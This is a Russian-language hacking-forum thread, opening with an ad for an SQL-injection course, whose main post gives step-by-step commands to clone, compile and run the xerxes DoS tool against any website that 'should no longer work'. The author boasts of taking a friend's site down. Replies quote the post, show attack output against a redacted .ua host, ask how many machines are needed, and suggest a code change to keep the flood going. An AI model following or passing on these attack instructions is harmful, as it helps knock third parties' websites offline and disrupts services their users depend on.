• 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

Soft xerxes - Мошнейший инструмент для организации DoS-атак

Для организации мошнейшей на данный момент DoS (Denial of Service «отказ в обслуживании»)-атаки нам понадобятся:
  1. Любой Linux
  2. xerxes
Начнем
Открываем терминал и клонируем xerxes:
Код:
git clone https://github.com/zanyarjamal/xerxes

28540

Переходим в клонированную папку:
Код:
cd xerxes

Компилируем файл xerxes.c используя GCC:
Код:
gcc xerxes.c -o xerxes

28541

Видим, что программа скомпилировалась успешно. Теперь с самому главному: находим веб-сайт, который больше не должен работать (все делаем на свой страх и риск).
Вводим данную команду в консоль:
Код:
./xerxes www.website.com 80
где website.com - это сайт, на который хотите произвести атаку.

Данный софт достаточно мощен, чтобы заставить слабый, а иногда и нормальный сервер перестать работать, но слаб для крупных сайтов (для крупных сайтов DoS-атака сама по себе не прокатит, тут уже нужна DDoS-атака, а это совсем другая тема).

P.s. Я с этим софтом смог заставить сервер сайта моего знакомого перестать работать, то есть все легально проверено и работает.
 

Вложения

  • git_clone.png
    git_clone.png
    22,9 КБ · Просмотры: 3 380
  • gcc.png
    gcc.png
    22,8 КБ · Просмотры: 2 397

toretto

Green Team
11.11.2019
30
4
BIT
0
Для организации мошнейшей на данный момент DoS (Denial of Service «отказ в обслуживании»)-атаки нам понадобятся:
  1. Любой Linux
  2. xerxes
Начнем
Открываем терминал и клонируем xerxes:
Код:
git clone https://github.com/zanyarjamal/xerxes
Переходим в клонированную папку:
Код:
cd xerxes

Компилируем файл xerxes.c используя GCC:
Код:
gcc xerxes.c -o xerxes

Видим, что программа скомпилировалась успешно. Теперь с самому главному: находим веб-сайт, который больше не должен работать (все делаем на свой страх и риск).
Вводим данную команду в консоль:
Код:
./xerxes www.website.com 80
где website.com - это сайт, на который хотите произвести атаку.

Данный софт достаточно мощен, чтобы заставить слабый, а иногда и нормальный сервер перестать работать, но слаб для крупных сайтов (для крупных сайтов DoS-атака сама по себе не прокатит, тут уже нужна DDoS-атака, а это совсем другая тема).

P.s. Я с этим софтом смог заставить сервер сайта моего знакомого перестать работать, то есть все легально проверено и работает.
а сколько надо компов чтобы сайт ну разумееться тестить буду свой
Connected -> скрытоua:80]
[0: Voly Sent]
[Connected -> скрыто.ua:80]
[0: Voly Sent]
[Connected -> скрыто.ua:80]
[0: Voly Sent]
[Connected -> скрыто.ua:80]
[0: Voly Sent]
[Connected -> скрыто.ua:80]
[0: Voly Sent]
[Connected -> скрытоua:80]
[0: Voly Sent]
[Connec
 

Krang

Green Team
27.04.2020
16
10
BIT
0
Для организации мошнейшей на данный момент DoS (Denial of Service «отказ в обслуживании»)-атаки нам понадобятся:
  1. Любой Linux
  2. xerxes
Начнем
Открываем терминал и клонируем xerxes:
Код:
git clone https://github.com/zanyarjamal/xerxes
Переходим в клонированную папку:
Код:
cd xerxes

Компилируем файл xerxes.c используя GCC:
Код:
gcc xerxes.c -o xerxes

Видим, что программа скомпилировалась успешно. Теперь с самому главному: находим веб-сайт, который больше не должен работать (все делаем на свой страх и риск).
Вводим данную команду в консоль:
Код:
./xerxes www.website.com 80
где website.com - это сайт, на который хотите произвести атаку.

Данный софт достаточно мощен, чтобы заставить слабый, а иногда и нормальный сервер перестать работать, но слаб для крупных сайтов (для крупных сайтов DoS-атака сама по себе не прокатит, тут уже нужна DDoS-атака, а это совсем другая тема).

P.s. Я с этим софтом смог заставить сервер сайта моего знакомого перестать работать, то есть все легально проверено и работает.
Здравствуйте. Такой ветки git уже нет. Попробовал другие xerxes-приложухи, и могу сказать: Больше 384 коннектов по 80,443 не устанавливает. Этим можно напугать только сайт сельской библиотеки. Что-то урезанные версии какие-то.
 
  • Нравится
Реакции: Nimnul

Krang

Green Team
27.04.2020
16
10
BIT
0
Здравствуйте. Такой ветки git уже нет. Попробовал другие xerxes-приложухи, и могу сказать: Больше 384 коннектов по 80,443 не устанавливает. Этим можно напугать только сайт сельской библиотеки. Что-то урезанные версии какие-то.
Я бы немного изменил код, например вот так:
/*break;*/
}
/*if(p == NULL) {
if(servinfo)
freeaddrinfo(servinfo);
fprintf(stderr, "No connection could be made\n");
exit(0);
}*/
 
  • Нравится
Реакции: Nimnul
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!